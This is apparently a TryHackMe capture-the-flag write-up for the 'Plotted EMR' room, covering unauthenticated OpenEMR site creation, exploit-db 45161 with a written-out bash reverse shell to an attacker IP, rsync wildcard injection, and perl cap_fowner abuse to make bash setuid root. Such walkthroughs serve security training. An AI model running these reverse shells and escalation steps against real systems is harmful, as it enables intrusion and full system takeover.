Plotted EMR – Hard

This writeup will cover the Plotted EMR room on TryHackMe.

Summary

• Nmap shows that the following ports are open:
  • 21/ftp
  • 22/ssh
  • 80/http
  • 5900/mysql
  • 8890/http
• Anonymous login allowed FTP
• FTP – /.-/.../you_are_determined.txt (Contains hint that username is admin)
• Upon enumerating port 5900 (mysql), we find that we can authenticate as the user admin without any password. However, there is’nt any interesting information.
  • mysql -u admin -h {ip} -P 5900
• GoBuster finds some random files on port 80, However, there is a /portal directory on port 8890.
• OpenEMR running on port 8890
• Public Exploit requires authentication
• Upon research, we find that setup.php and admin.php are available to unauthenticated users.
• OpenEMR instance allows multiple sites to be created.
• Initial foothold by adding a new site and using the public exploit against it.
• OpenEMR – 5.0.1.3
• Flag 1 – /var/www/ThisFileIsInteresting
•  rsync cron job with wildcard running as plot_admin
• Leverage wildcard injection to escalate privileges to plot_admin
• We find that /usr/bin/perl has cap_fowner capability.
  • We’ll leverage this to escalate our privileges to root.
• All Done 😀

Enumeration

• Nmap and rustscan show that the following ports are open:
  • 21/ftp
  • 22/ssh
  • 80/http
  • 5900/mysql
  • 8890/http
• Nmap also reveals that anonymous logons are allowed for FTP.
• By enumerating the ftp service, we find that there is a file called you_are_determined.txt
• Following are the contents of the file mentioned above: 

				
					Sorry, but you wasted your time!

Here is something for you :D
https://www.youtube.com/watch?v=dQw4w9WgXcQ

Wait..I'll give you a hint: see if you can access the `admin` account
				
			

• The hint above suggested that there might be a user called admin. We make a note of this and continue enumerating.
• Upon enumerating port 5900 (mysql), we find that we can authenticate as the user admin without any password. However, there is’nt any interesting information.
  • mysql -u admin -h {ip} -P 5900
• Running GoBuster on both ports 80 and 8890, finds multiple files with Base64 encoded text.
• However, on port 8890, we find that there is a directory called portal.
• Upon browsing to the directory, we are presented with the OpenEMR login page.

• Since we have a hint that the user might be admin, we try using some common passwords, no luck.
• Brute-forcing with hydra using rockyou wordlist doesn’t take us anywhere.
• Upon researching on google, we find a vulnerability report for openemr by ‘Project Insecurity’
  • https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf
• We find that there are multiple ways in which we can exploit this. However, authentication is required.
• In the same report, we also find the application is affected by unauthenticated information disclosure ( setup.php and admin.php files )   
• Upon, browsing to admin.php, we find that we can add a new site.
• Therefore, we could leverage this to get admin access to the application and then use the public exploit to gain RCE.
• Process:
  • Browse to http://{ip}:8890/portal/admin.php
  • Add a new site, with the option I have already created the database
  • Either use the mysql running on port 5900 or host a dummy mysql server on attack machine
    • CREATE DATABASE openemr;
    • CREATE USER 'openemr_user'@'%' IDENTIFIED BY 'Password12';
    • GRANT ALL PRIVILEGES ON openemr.* TO 'openemr_user'@'%';
    • FLUSH PRIVILEGES;
  • Enter the appropriate details in the config screen
  • Wait for the process to finish
• Note: this process takes some time (~2 mins, if using the AttackBox), however you can monitor DB progress using:
• SELECT table_schema as `Database`, table_name AS `Table`, round(((data_length + index_length) / 1024 / 1024), 2) `Size
in MB` FROM information_schema.TABLES ORDER BY (data_length + index_length) DESC LIMIT 0,10;
• Additionally, this doesn’t work properly when proxied via Burp 

Exploitation

• There are multiple exploits available for the specified version, in this writeup we are covering (45161)
  • Note: The machine has been configured to disallow some of the exploits.
• We need to modify the exploit to authenticate using our newly created site:
  • On line 66, change ?site=default to ?site={nameofnewsite}
• Exploit Commands: 

				
					python2 45161.py -u {username} -p {password} -c '/bin/bash -i >& /dev/tcp/10.9.4.47/1234 0>&1' http://{ip}:8890/portal

nc -nvlp 1234				
			

• We got a shell as www-data.
• Looking inside the /var/www, we find a file called ThisFileIsInteresting. 
• This file contains our 1st flag.

Privilege Escalation - 1

• Looking at the contents of crontab, we find that there is a rsync job running as plot_admin every minute and has a wildcard in the command.
• We can leverage this to perform wildcard injection and escalate privileges to plot_admin
• Process:
  • cd /var/www/html/portal/config
  • echo "cp /bin/bash /home/plot_admin/pa_shell; chmod +xs /home/plot_admin/pa_shell" > shell.sh
  • chmod +x shell.sh
  • touch -- "-e sh shell.sh"
  • /home/plot_admin/pa_shell.sh -p

Privilege Escalation - 2

• Looking for ways to escalate privileges from plot_admin, we find the following:
  • sudo -l (Password Required)
  • find / -type f -perm -u=s 2>/dev/null (Nothing Suspicious)
  • Searching for possible passwords for the user plot_admin, no luck.
  • getcap -r / 2>/dev/null (/usr/bin/perl has cap_fowner capability)

• Since we have cap_fowner capability for /usr/bin/perl, we can leverage this to escalate privileges to root.
• The following commands can be used to gain root privileges:
  • /usr/bin/perl -e 'chmod 04777, "/bin/bash";'
  • /bin/bash -p
• All Done! 😀

Hope you enjoyed reading this writeup.
Happy Hunting! 😀

Posted by: infinity

Helpful Links

• https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf
• https://www.exploit-db.com/exploits/45161